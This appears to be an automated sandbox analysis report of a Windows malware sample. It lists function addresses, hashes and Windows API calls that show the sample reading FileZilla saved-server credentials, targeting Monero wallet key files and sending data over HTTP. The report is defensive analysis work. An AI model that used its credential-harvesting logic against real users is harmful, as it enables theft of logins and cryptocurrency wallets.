                                • Associated: 00000000.00000002.1310601504.0000000001014000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001110000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001117000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001126000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311295036.0000000001127000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311460333.00000000012BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: af66ae12452379ad410662fde541a46e53a8cd163c7b26b1adeec745b377db9c
                                • Instruction ID: 4bbc0faa2d7429bc4ef45714cee004e0da27942370250d9a358487f4fae518e2
                                • Opcode Fuzzy Hash: af66ae12452379ad410662fde541a46e53a8cd163c7b26b1adeec745b377db9c
                                • Instruction Fuzzy Hash: 366113F390C2009BE3046E29ED8577AF7E5EF94720F1A893DD6C983B84D9395C148796
                                Function 00FC8559 Relevance: .2, Instructions: 217COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310601504.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                • Associated: 00000000.00000002.1310379765.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001014000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001110000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001117000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001126000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311295036.0000000001127000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311460333.00000000012BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 7274656e5f650b97986d66a555abb5a985adf27a8325b536dbb9e82c730c745e
                                • Instruction ID: 4a99e58974119421304a8292b9144ea788e0b1472a68123f49dc042bcf204501
                                • Opcode Fuzzy Hash: 7274656e5f650b97986d66a555abb5a985adf27a8325b536dbb9e82c730c745e
                                • Instruction Fuzzy Hash: 4C6129B3A082109FE314AE69DC8476BBBD5EBD4320F1AC53DDAC897744DA794C0587C6
                                Function 00EB9D7F Relevance: .2, Instructions: 204COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310601504.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                • Associated: 00000000.00000002.1310379765.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001014000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001110000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001117000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001126000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311295036.0000000001127000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311460333.00000000012BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: f6c215728803b318a61b11d92e9bba7860ae8ae51851bc939ef747d36d056463
                                • Instruction ID: 0932cde4508b02f8d08205a88d7fa0355ff019cf5e02acb135e3ecc2e88aeefd
                                • Opcode Fuzzy Hash: f6c215728803b318a61b11d92e9bba7860ae8ae51851bc939ef747d36d056463
                                • Instruction Fuzzy Hash: 4C51F6B3B092045FF3046E7DDD4477AB7DAEBD4320F2B863DEA8483784E97558058155
                                Function 00F936FE Relevance: .2, Instructions: 175COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310601504.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                • Associated: 00000000.00000002.1310379765.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001014000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001110000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001117000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001126000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311295036.0000000001127000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311460333.00000000012BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: f70aa49f2b0551ad9556f2af1c8a789077f2b92f149e51acdb9a2a7eedd90c20
                                • Instruction ID: b136676b35dbbbfd545f616fcb51be593ca0e018f5fd061175cde4c7cabba478
                                • Opcode Fuzzy Hash: f70aa49f2b0551ad9556f2af1c8a789077f2b92f149e51acdb9a2a7eedd90c20
                                • Instruction Fuzzy Hash: BB515CF7A082145FE314AA39DC4577BFB99EBD4720F26853DDAC9D3784EA3588028192
                                Function 00FE7C6F Relevance: .2, Instructions: 157COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310601504.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                • Associated: 00000000.00000002.1310379765.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001014000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001110000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001117000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001126000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311295036.0000000001127000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311460333.00000000012BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 9e1b7846a52446305efc5aa27e0d7f9b19a5a950d30790a54797073e971b204a
                                • Instruction ID: eab496a6337cd8984e1e0aa57bdc35b1bced399062ca75c53110d0c185caaa6e
                                • Opcode Fuzzy Hash: 9e1b7846a52446305efc5aa27e0d7f9b19a5a950d30790a54797073e971b204a
                                • Instruction Fuzzy Hash: 194117B3A082209BE3186E2DEC557BAFBD5EF94720F16453DDAC5D3380E9795C4086C6
                                Function 010A0B00 Relevance: .1, Instructions: 120COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310601504.0000000001014000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                • Associated: 00000000.00000002.1310379765.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001110000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001117000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001126000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311295036.0000000001127000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311460333.00000000012BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: ac4946bb804758794658792ff53ea26b71918f11b9f16f25541618fbcb8897c9
                                • Instruction ID: 949c9767b1d20c3ee3c7ef8fe340dd18d14c5e58327f7efec0086af7741f2b90
                                • Opcode Fuzzy Hash: ac4946bb804758794658792ff53ea26b71918f11b9f16f25541618fbcb8897c9
                                • Instruction Fuzzy Hash: 833148F381C61DEFC3185FA49E6163EB6D5AB58350F564A2DF9C79B70CE5B108818283
                                Function 00C49750 Relevance: .0, Instructions: 15COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310468035.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                • Associated: 00000000.00000002.1310379765.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001014000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001110000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001117000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001126000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311295036.0000000001127000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311460333.00000000012BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                                • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                                Function 00C40250 Relevance: 68.6, APIs: 29, Strings: 10, Instructions: 366stringmemoryCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00C4A740: lstrcpy.KERNEL32(00C50E17,00000000), ref: 00C4A788
                                  • Part of subcall function 00C48DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00C48E0B
                                  • Part of subcall function 00C4A920: lstrcpy.KERNEL32(00000000,?), ref: 00C4A972
                                  • Part of subcall function 00C4A920: lstrcat.KERNEL32(00000000), ref: 00C4A982
                                  • Part of subcall function 00C4A8A0: lstrcpy.KERNEL32(?,00C50E17), ref: 00C4A905
                                  • Part of subcall function 00C4A9B0: lstrlen.KERNEL32(?,019F8A88,?,\Monero\wallet.keys,00C50E17), ref: 00C4A9C5
                                  • Part of subcall function 00C4A9B0: lstrcpy.KERNEL32(00000000), ref: 00C4AA04
                                  • Part of subcall function 00C4A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C4AA12
                                  • Part of subcall function 00C4A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00C4A7E6
                                  • Part of subcall function 00C399C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00C399EC
                                  • Part of subcall function 00C399C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00C39A11
                                  • Part of subcall function 00C399C0: LocalAlloc.KERNEL32(00000040,?), ref: 00C39A31
                                  • Part of subcall function 00C399C0: ReadFile.KERNEL32(000000FF,?,00000000,00C3148F,00000000), ref: 00C39A5A
                                  • Part of subcall function 00C399C0: LocalFree.KERNEL32(00C3148F), ref: 00C39A90
                                  • Part of subcall function 00C399C0: CloseHandle.KERNEL32(000000FF), ref: 00C39A9A
                                  • Part of subcall function 00C48E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00C48E52
                                • GetProcessHeap.KERNEL32(00000000,000F423F,00C50DBA,00C50DB7,00C50DB6,00C50DB3), ref: 00C40362
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00C40369
                                • StrStrA.SHLWAPI(00000000,<Host>), ref: 00C40385
                                • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00C50DB2), ref: 00C40393
                                • StrStrA.SHLWAPI(00000000,<Port>), ref: 00C403CF
                                • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00C50DB2), ref: 00C403DD
                                • StrStrA.SHLWAPI(00000000,<User>), ref: 00C40419
                                • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00C50DB2), ref: 00C40427
                                • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00C40463
                                • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00C50DB2), ref: 00C40475
                                • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00C50DB2), ref: 00C40502
                                • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00C50DB2), ref: 00C4051A
                                • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00C50DB2), ref: 00C40532
                                • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00C50DB2), ref: 00C4054A
                                • lstrcat.KERNEL32(?,browser: FileZilla), ref: 00C40562
                                • lstrcat.KERNEL32(?,profile: null), ref: 00C40571
                                • lstrcat.KERNEL32(?,url: ), ref: 00C40580
                                • lstrcat.KERNEL32(?,00000000), ref: 00C40593
                                • lstrcat.KERNEL32(?,00C51678), ref: 00C405A2
                                • lstrcat.KERNEL32(?,00000000), ref: 00C405B5
                                • lstrcat.KERNEL32(?,00C5167C), ref: 00C405C4
                                • lstrcat.KERNEL32(?,login: ), ref: 00C405D3
                                • lstrcat.KERNEL32(?,00000000), ref: 00C405E6
                                • lstrcat.KERNEL32(?,00C51688), ref: 00C405F5
                                • lstrcat.KERNEL32(?,password: ), ref: 00C40604
                                • lstrcat.KERNEL32(?,00000000), ref: 00C40617
                                • lstrcat.KERNEL32(?,00C51698), ref: 00C40626
                                • lstrcat.KERNEL32(?,00C5169C), ref: 00C40635
                                • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00C50DB2), ref: 00C4068E
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310468035.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                • Associated: 00000000.00000002.1310379765.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001014000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001110000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001117000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001126000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311295036.0000000001127000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311460333.00000000012BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                                • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                                • API String ID: 1942843190-555421843
                                • Opcode ID: 7f2b12d646851e28e1ffebbc1b87422527b667644c49ede37663dab1fed22db7
                                • Instruction ID: cade58aeab03dc2aecdabf3fa54209c46841dc607e3b68636908b87c919c04ea
                                • Opcode Fuzzy Hash: 7f2b12d646851e28e1ffebbc1b87422527b667644c49ede37663dab1fed22db7
                                • Instruction Fuzzy Hash: 9ED14175940208AFDB04EBF4DD9AEEE7338FF54301F544428F506B6091DE34AA49EB66
                                Function 00C35960 Relevance: 39.0, APIs: 17, Strings: 5, Instructions: 495networkstringmemoryCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00C4A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00C4A7E6
                                  • Part of subcall function 00C347B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00C34839
                                  • Part of subcall function 00C347B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00C34849
                                  • Part of subcall function 00C4A740: lstrcpy.KERNEL32(00C50E17,00000000), ref: 00C4A788
                                • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00C359F8
                                • StrCmpCA.SHLWAPI(?,019FF380), ref: 00C35A13
                                • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00C35B93
                                • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,019FF1F0,00000000,?,019FE708,00000000,?,00C51A1C), ref: 00C35E71
                                • lstrlen.KERNEL32(00000000), ref: 00C35E82
                                • GetProcessHeap.KERNEL32(00000000,?), ref: 00C35E93
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00C35E9A
                                • lstrlen.KERNEL32(00000000), ref: 00C35EAF
                                • lstrlen.KERNEL32(00000000), ref: 00C35ED8
                                • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00C35EF1
                                • lstrlen.KERNEL32(00000000,?,?), ref: 00C35F1B
                                • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00C35F2F
                                • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00C35F4C
                                • InternetCloseHandle.WININET(00000000), ref: 00C35FB0
                                • InternetCloseHandle.WININET(00000000), ref: 00C35FBD
                                • HttpOpenRequestA.WININET(00000000,019FF1E0,?,019FECB8,00000000,00000000,00400100,00000000), ref: 00C35BF8
                                  • Part of subcall function 00C4A9B0: lstrlen.KERNEL32(?,019F8A88,?,\Monero\wallet.keys,00C50E17), ref: 00C4A9C5
                                  • Part of subcall function 00C4A9B0: lstrcpy.KERNEL32(00000000), ref: 00C4AA04
                                  • Part of subcall function 00C4A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C4AA12
                                  • Part of subcall function 00C4A8A0: lstrcpy.KERNEL32(?,00C50E17), ref: 00C4A905
                                  • Part of subcall function 00C4A920: lstrcpy.KERNEL32(00000000,?), ref: 00C4A972
                                  • Part of subcall function 00C4A920: lstrcat.KERNEL32(00000000), ref: 00C4A982
                                • InternetCloseHandle.WININET(00000000), ref: 00C35FC7
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310468035.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                • Associated: 00000000.00000002.1310379765.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001014000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001110000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001117000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001126000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311295036.0000000001127000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311460333.00000000012BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                                • String ID: "$"$------$------$------
                                • API String ID: 874700897-2180234286
                                • Opcode ID: caf5f1fbbd153ffc8637a38b3de5cad463b95ebdf3dc1ef40478ab84adf0db08
                                • Instruction ID: fb586a665d7cb260ab400308e38952464b368017280295b05351bf5552d89be8
                                • Opcode Fuzzy Hash: caf5f1fbbd153ffc8637a38b3de5cad463b95ebdf3dc1ef40478ab84adf0db08
                                • Instruction Fuzzy Hash: 58121E71860118ABEB15EBA0DC96FEEB378FF54700F5041A9F50A72091EF702A89DF65
                                Function 00C3CEF0 Relevance: 30.4, APIs: 20, Instructions: 375stringmemoryfileCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00C4A740: lstrcpy.KERNEL32(00C50E17,00000000), ref: 00C4A788
                                  • Part of subcall function 00C4A9B0: lstrlen.KERNEL32(?,019F8A88,?,\Monero\wallet.keys,00C50E17), ref: 00C4A9C5
                                  • Part of subcall function 00C4A9B0: lstrcpy.KERNEL32(00000000), ref: 00C4AA04
                                  • Part of subcall function 00C4A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C4AA12
                                  • Part of subcall function 00C4A8A0: lstrcpy.KERNEL32(?,00C50E17), ref: 00C4A905
                                  • Part of subcall function 00C48B60: GetSystemTime.KERNEL32(00C50E1A,019FE738,00C505AE,?,?,00C313F9,?,0000001A,00C50E1A,00000000,?,019F8A88,?,\Monero\wallet.keys,00C50E17), ref: 00C48B86
                                  • Part of subcall function 00C4A920: lstrcpy.KERNEL32(00000000,?), ref: 00C4A972
                                  • Part of subcall function 00C4A920: lstrcat.KERNEL32(00000000), ref: 00C4A982
                                • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00C3CF83
                                • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00C3D0C7
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00C3D0CE
                                • lstrcat.KERNEL32(?,00000000), ref: 00C3D208
                                • lstrcat.KERNEL32(?,00C51478), ref: 00C3D217
                                • lstrcat.KERNEL32(?,00000000), ref: 00C3D22A
                                • lstrcat.KERNEL32(?,00C5147C), ref: 00C3D239
                                • lstrcat.KERNEL32(?,00000000), ref: 00C3D24C
                                • lstrcat.KERNEL32(?,00C51480), ref: 00C3D25B
                                • lstrcat.KERNEL32(?,00000000), ref: 00C3D26E
                                • lstrcat.KERNEL32(?,00C51484), ref: 00C3D27D
                                • lstrcat.KERNEL32(?,00000000), ref: 00C3D290
                                • lstrcat.KERNEL32(?,00C51488), ref: 00C3D29F
                                • lstrcat.KERNEL32(?,00000000), ref: 00C3D2B2
                                • lstrcat.KERNEL32(?,00C5148C), ref: 00C3D2C1
                                • lstrcat.KERNEL32(?,00000000), ref: 00C3D2D4
                                • lstrcat.KERNEL32(?,00C51490), ref: 00C3D2E3
                                  • Part of subcall function 00C4A820: lstrlen.KERNEL32(00C34F05,?,?,00C34F05,00C50DDE), ref: 00C4A82B
                                  • Part of subcall function 00C4A820: lstrcpy.KERNEL32(00C50DDE,00000000), ref: 00C4A885
                                • lstrlen.KERNEL32(?), ref: 00C3D32A
                                • lstrlen.KERNEL32(?), ref: 00C3D339
                                  • Part of subcall function 00C4AA70: StrCmpCA.SHLWAPI(019F8B78,00C3A7A7,?,00C3A7A7,019F8B78), ref: 00C4AA8F
                                • DeleteFileA.KERNEL32(00000000), ref: 00C3D3B4
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310468035.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
